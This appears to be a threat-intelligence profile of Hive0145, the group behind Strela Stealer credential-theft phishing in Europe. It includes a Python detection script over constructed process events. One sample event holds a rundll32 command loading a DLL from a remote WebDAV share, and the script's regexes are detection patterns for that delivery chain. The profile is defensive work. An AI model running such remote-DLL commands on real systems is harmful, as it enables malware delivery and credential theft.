Hive0145
Hive0145 is a financially motivated threat actor assessed to be an initial access broker (IAB) and likely the sole operator behind Strela Stealer campaigns since at least 2022. The group has conducted ongoing phishing campaigns across Europe, with primary targeting observed in Spain, Germany, and Ukraine, and has also been reported targeting Italy in Strela Stealer activity. Hive0145 uses stolen authentic invoice emails and previously exfiltrated email credentials to improve phishing credibility, including an "attachment hijacking" technique in which the original email body is preserved while the attachment is replaced with a malicious payload and the sender details are tailored to the next victim.

Campaigns commonly use invoice or receipt lures, encrypted ZIP archives with per-email passwords, and archives containing heavily obfuscated JavaScript downloaders that retrieve and execute crypted Strela Stealer DLLs, often via WebDAV and rundll32.exe.

Hive0145 has iterated on delivery and evasion techniques since late 2022. Reported methods include use of polyglot files, valid code-signing certificates, uncommon executable extensions such as .com and .pif, and a custom crypter/loader referred to as Stellar Crypter or Stellar Loader. IBM X-Force reported that the actor may automate harvesting, weaponizing, packaging, and sending phishing emails, supported by a steady supply of freshly stolen emails.

Recent Strela Stealer variants added host profiling through system and installed-application enumeration, as well as expanded language and locale checks including Ukrainian. Strela Stealer is designed to steal credentials from Microsoft Outlook and Mozilla Thunderbird, including Thunderbird profile data and Outlook IMAP credentials, and exfiltrates the data over HTTP POST to hardcoded command-and-control infrastructure. The stolen credentials are used to fuel subsequent phishing waves, and reporting assesses that this activity supports Hive0145's role as an IAB.

Separate reporting states that another actor, Detour Dog, acted as a service provider or partner distributing Strela Stealer for Hive0145 via the StarFish backdoor, while Hive0145 remained the operator of the stealer malware. Known alias: hive0145.
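As an added detection illustration (not from the reporting above and not a vendor rule), the following Python flags the delivery chain the profile describes: a script host running a JavaScript downloader from a user-writable directory, rundll32.exe loading a DLL from a WebDAV UNC path, and executables with uncommon .com/.pif extensions. It runs over constructed Sysmon-style process-creation events; the field names, paths, hostnames and rule names are assumptions.

```python
import re

# Constructed Sysmon-style process-creation events (assumed field names; not real telemetry)
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\System32\wscript.exe", "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe \\203.0.113.5@80\davwwwroot\update.dll,Entry"},
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe shell32.dll,Control_RunDLL desk.cpl"},
    {"parent": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Users\u\AppData\Local\Temp\invoice_2024.pif",
     "cmdline": r'"C:\Users\u\AppData\Local\Temp\invoice_2024.pif"'},
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe "C:\Users\u\Downloads\Rechnung_4471.js"'},
]

# \\host\share or \\host@port\DavWWWRoot: a DLL path that points at a remote (WebDAV) share
UNC_RE = re.compile(r"\\\\[\w.-]+(@\d+)?\\", re.I)
# A .js launched by a script host from a user-writable directory (the downloader stage)
USER_JS_RE = re.compile(r"\\(downloads|temp)\\[^\"]*\.js\b", re.I)
SUSPICIOUS_EXT = (".com", ".pif")          # uncommon executable extensions noted in reporting
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")

def classify(event):
    """Return the names of the detection rules that fire for one event."""
    image, parent, cmd = event["image"].lower(), event["parent"].lower(), event["cmdline"]
    hits = []
    if image.endswith("rundll32.exe") and UNC_RE.search(cmd):
        hits.append("rundll32_unc_webdav_dll")
    if image.endswith(SUSPICIOUS_EXT):
        hits.append("uncommon_executable_extension")
    if parent.endswith(SCRIPT_HOSTS) and image.endswith(("rundll32.exe",) + SUSPICIOUS_EXT):
        hits.append("script_host_spawned_loader")
    if image.endswith(SCRIPT_HOSTS) and USER_JS_RE.search(cmd):
        hits.append("script_host_user_dir_js")
    return hits

def scan(events):
    """Index every event that triggers at least one rule, with the rules that fired."""
    findings = []
    for idx, event in enumerate(events):
        hits = classify(event)
        if hits:
            findings.append((idx, hits))
    return findings

if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {', '.join(hits)}")
```

The benign rundll32 invocation of a Control Panel applet (event 1) fires nothing, which is the point of anchoring the rules on the remote-share path and the script-host parent rather than on rundll32.exe alone.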
Recent activity
5 sources tracked across advisories, community write-ups, and news.
Financially motivated actor assessed as the exclusive operator behind Strela Stealer campaigns since at least 2022; likely acts as an initial access broker acquiring and selling access to compromised systems.
Hive0145 is a cybercriminal group operating the Strela Stealer malware, which is distributed via partnerships with other groups such as Detour Dog.
Ongoing campaign delivering StrelaStealer malware to victims in Europe, extracting credentials from Microsoft Outlook and Mozilla Thunderbird via phishing emails using stolen invoice notifications.
Hive0145 is a criminal group conducting phishing campaigns across Europe using Strela Stealer malware to steal email credentials and propagate further attacks.